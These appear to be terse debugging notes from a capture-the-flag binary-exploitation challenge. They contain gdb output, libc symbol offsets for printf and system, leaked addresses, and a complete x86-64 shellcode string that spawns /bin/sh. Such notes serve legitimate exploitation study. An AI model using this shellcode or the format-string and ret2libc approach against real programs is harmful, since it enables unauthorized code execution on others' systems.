*main+190: printf format string
*main+195: jump # just after printf

*main+315: ret 0x55b054b22d3b



ldd ./ret222-c49...
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f988e021000)

objdump -T /lib/x86_64-linux-gnu/libc.so.6 | grep printf (system)
	0000000000056510 g    DF .text	00000000000000a1  GLIBC_2.2.5 printf
	00000000000456a0  w   DF .text	000000000000002d  GLIBC_2.2.5 system
	0000000000086930 g    DF .text	0000000000000184  GLIBC_2.2.5 malloc


0x00007ffff7dd7a60  malloc@plt

printf %p: 0x7fffffffb780


RBP: 0x7fffffffde80 --> 0x555555554d40 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffddf0 --> 0x0

RBP: 0x555555554d40 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffde88 --> 0x7ffff7a303f1 (<__libc_start_main+241>:	mov    edi,eax)


0x00007ffff7dd36b8  name


0x7ffff7dd36b8  name
0x7fffffffb6e0


'\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05'
